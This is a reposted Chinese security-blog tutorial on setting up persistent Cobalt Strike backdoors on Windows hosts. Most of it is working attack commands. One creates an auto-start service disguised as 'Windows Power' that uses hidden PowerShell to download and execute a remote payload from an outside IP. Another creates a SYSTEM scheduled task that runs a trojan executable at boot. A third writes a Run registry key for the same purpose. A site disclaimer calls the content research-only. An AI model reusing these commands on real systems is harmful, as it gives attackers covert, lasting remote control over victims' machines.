【远控使用】Cobalt Strike可持续后门的使用

admin 2022年1月10日03:33:37安全博客评论18 views765字阅读2分33秒阅读模式

前言

  • Cobalt Strike的基础使用

一、服务器自启动配置

1、创建服务

1
shell sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.43.22:80/a'))\""

2、设置服务会自动启动

1
2
3
4
shell sc config "Windows Power" start= auto
shell sc description "Windows Power" "Windows auto service" #描述
shell sc start "Windows Power" #来启动
shell net start Windows Power

会被防火墙拦截,也可以换个木马执行

image-20210917162510909

二、计划任务

1、创建任务

1
shell schtasks /create /tn "windowsup" /tr "C:\artifact.exe" /ru SYSTEM /sc onstart

2、修改字符集和查询

1
2
chcp 437 
shell schtasks /query /tn windowsup

3、启动

1
shell schtasks /run /tn windowsup

image-20210917164534933

image-20210917165216574

4、删除计划

1
shell schtasks /delete /tn windowsup

三、注册表启动

系统启动时,就会执行木马

1
shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\artifact.exe" /f

image-20210917170307071

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:33:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【远控使用】Cobalt Strike可持续后门的使用 http://cn-sec.com/archives/730022.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: